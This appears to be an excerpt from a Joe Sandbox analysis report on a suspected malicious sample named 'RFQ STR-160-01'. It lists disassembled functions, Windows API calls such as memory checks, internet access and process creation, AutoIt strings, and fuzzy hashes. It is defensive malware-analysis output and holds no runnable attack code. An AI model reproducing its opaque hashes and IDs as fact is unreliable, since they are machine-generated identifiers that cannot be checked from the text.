              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: BuffCharUpper$_wcslen
              • String ID: <se
              • API String ID: 3544283678-3959060996
              • Opcode ID: 484e1d8876bd998f048efc78c34ccab9d0c9fdbf8e6a46a5b66af3de2fe655b4
              • Instruction ID: 58982fac25b994a01baa2c8a562f40d092b98dd78b4433dc2909b5918e19cae4
              • Opcode Fuzzy Hash: 484e1d8876bd998f048efc78c34ccab9d0c9fdbf8e6a46a5b66af3de2fe655b4
              • Instruction Fuzzy Hash: 60617E3291411AEBCF04EBA4CC95DFDBB7ABF58300F584529F542A3191EF305A4ADBA0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: #
              • API String ID: 0-1885708031
              • Opcode ID: 7fa36c86ef1ab03248dc4e7f33217c4edfb3f051d460041caa7e68ca226eaa58
              • Instruction ID: 555205893d4ce5eee3a521ea4d157bdfe7bf9c92e98c653a182c8d83c3a01738
              • Opcode Fuzzy Hash: 7fa36c86ef1ab03248dc4e7f33217c4edfb3f051d460041caa7e68ca226eaa58
              • Instruction Fuzzy Hash: A2511139904286DFDF29DF29C486AFE7FA5FF66310F644059EC919B280D6349D42CBA0
              APIs
              • Sleep.KERNEL32(00000000), ref: 005AF2A2
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 005AF2BB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: GlobalMemorySleepStatus
              • String ID: @
              • API String ID: 2783356886-2766056989
              • Opcode ID: 1a08c1a02ccb8d68cfce0fe298f92f4427119168ecb260a2bbcf49cddfc058b2
              • Instruction ID: 35b14632da03ad3ded6a9b0d094f4c27deb5c0526b2426db448c4a5b37998270
              • Opcode Fuzzy Hash: 1a08c1a02ccb8d68cfce0fe298f92f4427119168ecb260a2bbcf49cddfc058b2
              • Instruction Fuzzy Hash: 8E5167724187499BD720AF10DC8ABAFBBF8FBC5300F81884DF19941195EB708569CB66
              APIs
              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 006157E0
              • _wcslen.LIBCMT ref: 006157EC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: BuffCharUpper_wcslen
              • String ID: CALLARGARRAY
              • API String ID: 157775604-1150593374
              • Opcode ID: b75bb53a49c266ef7246c81c13933e17e02ac9a5c0cd6e531d8490a1330a6ae0
              • Instruction ID: f90a8482f3bfc23add7366da094ab14619eec54e93143bdabe4c04775635489b
              • Opcode Fuzzy Hash: b75bb53a49c266ef7246c81c13933e17e02ac9a5c0cd6e531d8490a1330a6ae0
              • Instruction Fuzzy Hash: F0417C31A0011ADFCB54DFA9C8859EEBBB6FF99324F144029E516A7391E7349D81CB90
              APIs
              • _wcslen.LIBCMT ref: 0060D130
              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0060D13A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CrackInternet_wcslen
              • String ID: |
              • API String ID: 596671847-2343686810
              • Opcode ID: 2642f3e3a9f701c57459b0cf1a1577089deebf221efff816e5d6b1d7afa9e9c7
              • Instruction ID: 91ad6a3b7f505521274ff95a8516eb38eaba895d82ab55d4f16017385591bdaf
              • Opcode Fuzzy Hash: 2642f3e3a9f701c57459b0cf1a1577089deebf221efff816e5d6b1d7afa9e9c7
              • Instruction Fuzzy Hash: 38313E71D0010AABCF15EFA4CC89AEF7FBAFF44340F000159F815A6262DB31AA06CB60
              APIs
              • DestroyWindow.USER32(?,?,?,?), ref: 00623621
              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0062365C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$DestroyMove
              • String ID: static
              • API String ID: 2139405536-2160076837
              • Opcode ID: cbaffa8fd5289287991e9e30886afe8cbe1a984d88c585d77703c58d3cf1b6f8
              • Instruction ID: bd8396df83ebfe21420e290f7bd32e159e57a9f509f3cb2ad90402834da6c0ed
              • Opcode Fuzzy Hash: cbaffa8fd5289287991e9e30886afe8cbe1a984d88c585d77703c58d3cf1b6f8
              • Instruction Fuzzy Hash: D0318171110A14AEDB209F64DC40EFB77AAFF88720F109619F85597280DB35AD91DB60
              APIs
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0062461F
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00624634
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: '
              • API String ID: 3850602802-1997036262
              • Opcode ID: a8640b612ec1386e43a1a5f9accd03b7a46ed12cfc70a58f08d0377e7eeda1e6
              • Instruction ID: 07ee09e94e93bc32c3176f12613a282b750f2488137d75127e54322f03700f7c
              • Opcode Fuzzy Hash: a8640b612ec1386e43a1a5f9accd03b7a46ed12cfc70a58f08d0377e7eeda1e6
              • Instruction Fuzzy Hash: 95314A74A0171A9FDF14CFA9D990BDA7BB6FF49340F14406AE904AB341DB71A941CF90
              APIs
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0062327C
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00623287
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: Combobox
              • API String ID: 3850602802-2096851135
              • Opcode ID: 46733d96fc2b73c80d3918c995a534ede4bc7dfc4e10162a7b4442adfc7c38b5
              • Instruction ID: b6cb31b86caa5d51976a52d6737c6a3afb3d1416f24c2c68bc25f44672c4ef7f
              • Opcode Fuzzy Hash: 46733d96fc2b73c80d3918c995a534ede4bc7dfc4e10162a7b4442adfc7c38b5
              • Instruction Fuzzy Hash: 1A11D071301629AFEF219F54EC84EEB3B6BEB943A4F104128F918A7390D7359E518B60
              APIs
                • Part of subcall function 0059600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                • Part of subcall function 0059600E: GetStockObject.GDI32(00000011), ref: 00596060
                • Part of subcall function 0059600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
              • GetWindowRect.USER32(00000000,?), ref: 0062377A
              • GetSysColor.USER32(00000012), ref: 00623794
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$ColorCreateMessageObjectRectSendStock
              • String ID: static
              • API String ID: 1983116058-2160076837
              • Opcode ID: edbf8c04b76e2c170d90ca146299a0d0094ceb68dba1a8ae88b214a9d1a732c1
              • Instruction ID: b1d60ab17641907753b4a552cde2fc101dc95df35ffdf2affeefd597a9a29e42
              • Opcode Fuzzy Hash: edbf8c04b76e2c170d90ca146299a0d0094ceb68dba1a8ae88b214a9d1a732c1
              • Instruction Fuzzy Hash: 1A1159B261061AAFDF00DFA8DC45AEE7BBAFB08314F004514F955E3250E774E8219B50
              APIs
              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0060CD7D
              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0060CDA6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Internet$OpenOption
              • String ID: <local>
              • API String ID: 942729171-4266983199
              • Opcode ID: b736b605037fbbc4927110505ed8d79a18ecea4ca8698744906509bae6ad7e4c
              • Instruction ID: 45f78b564bcb623cd9ef86504cec9176fb4d67920606ce46646be75a66eb710a
              • Opcode Fuzzy Hash: b736b605037fbbc4927110505ed8d79a18ecea4ca8698744906509bae6ad7e4c
              • Instruction Fuzzy Hash: F611A071295631BAD7384B668C49EE7BEAAEF527B4F00432AB109831C0E6609845D6F0
              APIs
              • GetWindowTextLengthW.USER32(00000000), ref: 006234AB
              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006234BA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LengthMessageSendTextWindow
              • String ID: edit
              • API String ID: 2978978980-2167791130
              • Opcode ID: 1bf8838f6121b4cd24ae270a84bf42d5f9224357f963d0753046d641d7ac017d
              • Instruction ID: 95a64064fc8ec55abdeb81b3c6d51a172418091e417ca63b2f938c04567a1ae3
              • Opcode Fuzzy Hash: 1bf8838f6121b4cd24ae270a84bf42d5f9224357f963d0753046d641d7ac017d
              • Instruction Fuzzy Hash: 64119D71500929AAEB216E64EC44AEA3BABEB05374F504364FA60973D0C779DC529F60
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • CharUpperBuffW.USER32(?,?,?), ref: 005F6CB6
              • _wcslen.LIBCMT ref: 005F6CC2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: STOP
              • API String ID: 1256254125-2411985666
              • Opcode ID: 3cbd7216e3319e65051b9471920d38e7e4d1617a3f29349dcae1bde6e094d347
              • Instruction ID: 80299e0d6b384413ef6b3f49736be85a6c44af639550376db5524884425746ff
              • Opcode Fuzzy Hash: 3cbd7216e3319e65051b9471920d38e7e4d1617a3f29349dcae1bde6e094d347
              • Instruction Fuzzy Hash: 4701C43261052B9ACB209FBDDC859BF7FB5FBA1710B500928E9A2D7195EA39DD00C650
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005F1D4C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassMessageNameSend_wcslen
              • String ID: ComboBox$ListBox
              • API String ID: 624084870-1403004172
              • Opcode ID: d7b5f237ae119f865211455033e4be5b78123b357691de219ad4e4c00b28060b
              • Instruction ID: 661dc20dc0d8ba137ea0e15ff24a29ec81b80fb7c49975746dca3c4142ee78c5
              • Opcode Fuzzy Hash: d7b5f237ae119f865211455033e4be5b78123b357691de219ad4e4c00b28060b
              • Instruction Fuzzy Hash: 9F01F531600619AB8F04EBA4CC298FE7BB8FF82350B00091EA932A72C1EA3559088660
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
              • SendMessageW.USER32(?,00000180,00000000,?), ref: 005F1C46
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassMessageNameSend_wcslen
              • String ID: ComboBox$ListBox
              • API String ID: 624084870-1403004172
              • Opcode ID: 403c211ce14deb09934e8b6ec80ee98f92ff6290d5604da3361f409f31129296
              • Instruction ID: e0cff0807532de5fd3ee6469e0531391caee06c4b206f8120acf75e4177a04be
              • Opcode Fuzzy Hash: 403c211ce14deb09934e8b6ec80ee98f92ff6290d5604da3361f409f31129296
              • Instruction Fuzzy Hash: 6F01F77168010DA6CF04EB94CE699FF7BA8BF51340F10001EAA1673281EA289E0CC6B5
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
              • SendMessageW.USER32(?,00000182,?,00000000), ref: 005F1CC8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassMessageNameSend_wcslen
              • String ID: ComboBox$ListBox
              • API String ID: 624084870-1403004172
              • Opcode ID: 547ca72d4bb3492a03919ed04540739b1a87b3743ff5a2f28cb504a8fd9a5d0e
              • Instruction ID: b8153a770a80c8486d34d629d69fb14218304d9742bb78bb2195f6ec9d8d370e
              • Opcode Fuzzy Hash: 547ca72d4bb3492a03919ed04540739b1a87b3743ff5a2f28cb504a8fd9a5d0e
              • Instruction Fuzzy Hash: B301DB71A4051DA7DF14EB95CE1AAFE7FACBF51380F140019B91273281EA299F08C675
              APIs
              • __Init_thread_footer.LIBCMT ref: 005AA529
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Init_thread_footer_wcslen
              • String ID: ,%f$3y^
              • API String ID: 2551934079-2939242258
              • Opcode ID: aa6d5d56ab44998d869bf8cb03c5bbfcc36dfa1c608193d1899738b7947df62b
              • Instruction ID: 34bc85c96eb5264e067318c075484caf58bd6bb9e843933bbcb55a7766ccfc98
              • Opcode Fuzzy Hash: aa6d5d56ab44998d869bf8cb03c5bbfcc36dfa1c608193d1899738b7947df62b
              • Instruction Fuzzy Hash: CB012B31B01A124BCE14F76CDC2FAAD7F59BB8A710F401429F512571C2EF50AD01C69B
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 005F1DD3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassMessageNameSend_wcslen
              • String ID: ComboBox$ListBox
              • API String ID: 624084870-1403004172
              • Opcode ID: 20329b3e6d9307881df48aa8b9e27e2dbaafbc5281db8b5517b4ca7b9586f4e1
              • Instruction ID: 10fb9ebd49c437b8bdd0eba2b8321c86b6de59147e75d085a284edaae0cac5c6
              • Opcode Fuzzy Hash: 20329b3e6d9307881df48aa8b9e27e2dbaafbc5281db8b5517b4ca7b9586f4e1
              • Instruction Fuzzy Hash: D4F0F971A41619A6DF04F7A4CC69AFE7B7CBF41350F040919B922A32C1DA6459088264
              APIs
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00663018,0066305C), ref: 006281BF
              • CloseHandle.KERNEL32 ref: 006281D1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: \0f
              • API String ID: 3712363035-3782278232
              • Opcode ID: 9880aa6a90b0d20ea5e8bda0d21a0439a5cd5f61d8e0c4b02f09faec43654b9a
              • Instruction ID: e108d7f48ead5d43027da91940f53babd68604d5af75b502e13d963800650df0
              • Opcode Fuzzy Hash: 9880aa6a90b0d20ea5e8bda0d21a0439a5cd5f61d8e0c4b02f09faec43654b9a
              • Instruction Fuzzy Hash: 8BF089B1640721BEE3206B656C49FBB3E5EEB04764F001420FB08D52A2D6B59E1487F8
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: 3, 3, 16, 1
              • API String ID: 176396367-3042988571
              • Opcode ID: f1f65e91ac26899d436e79e80601029a21445996f9872884650924f2b2174994
              • Instruction ID: 9afd7916a7a87e7107760aa8fbbaa4d865e5a81ff1ff3d20537856f997259d26
              • Opcode Fuzzy Hash: f1f65e91ac26899d436e79e80601029a21445996f9872884650924f2b2174994
              • Instruction Fuzzy Hash: F0E02B022042211093311279ACC59FF5ADBDFC97A1718182BF981C2367EA949DD193A0
              APIs
              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005F0B23
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Message
              • String ID: AutoIt$Error allocating memory.
              • API String ID: 2030045667-4017498283
              • Opcode ID: b3d5807efd89fd00db1b3e69c64f2011e898fd36d770fe3a5d26d0820ee39bd2
              • Instruction ID: 756945a491b015eeb2ee57f9c7a5b9ef21aa1ee8e17e844b71bcb7252339c11b
              • Opcode Fuzzy Hash: b3d5807efd89fd00db1b3e69c64f2011e898fd36d770fe3a5d26d0820ee39bd2
              • Instruction Fuzzy Hash: DDE0D83124471926D22437947C0BFCD7EC9AF05B65F100426FB48554C38AE264900AEA
              APIs
